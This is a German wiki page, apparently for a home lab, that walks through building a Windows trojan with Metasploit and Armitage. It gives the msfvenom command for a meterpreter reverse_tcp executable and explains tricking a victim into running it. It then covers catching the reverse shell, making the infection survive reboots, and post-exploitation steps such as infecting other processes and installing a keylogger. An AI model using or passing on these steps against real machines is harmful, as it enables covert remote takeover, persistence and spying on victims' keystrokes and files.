Metasploit & armitage trojaner: Unterschied zwischen den Versionen
David (Diskussion | Beiträge) |
David (Diskussion | Beiträge) |
||
Zeile 58: | Zeile 58: | ||
=kurz Beispiel key loger= | =kurz Beispiel key loger= | ||
− | + | [[metasploit & armitage keyloger]] | |
− | |||
− | |||
− | |||
− | [[ |
Version vom 23. August 2016, 14:01 Uhr
setup Hacker
Kali linux ip: 192.168.242.91
setup Opfer
Windows 7 domaine rechner Benutzer: Admin ip: 192.168.242.76
Trojaner erstellen
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx --format=exe > program.exe
dem opfer das programm unterschieben
das opfer muss dazu gebracht werden das programm auszufüren wier bieten in diesem beispiel einfach die datei als download an
auf der opfer seite
kontrolle übernehmen
nun starten wier erst meta sploit und danach arimtage
wenn armitage gestarte ist erstellne wier einen server zum luaschen
- payload
- windows
- metapreter
- windows
hier passen wir den LPORT an
und warten darauf das sich unser opfer verbindet
nun erscheint oben rechts der opfer computer
Dauerhaft infizieren
als nächstes wollen wier den trojaner dauerhaft speichern
wir suchen nach persists und geben einen neuen port an
wen der computer nun neugestartet wird müssen wir nur auf dem neuen port lauschen und werden wieder verbunden
diese kann ein par minuten dauern
Was kann man machen
jetzt gibt es viele möglichkeiten
- rechtsklick infizierter pc
- meterpreter
- explore
- meterpreter
hier können wir uns Prozesse oder dateien anzeigen lassen andere Prozesse infizieren oder einen keyloger installieren usw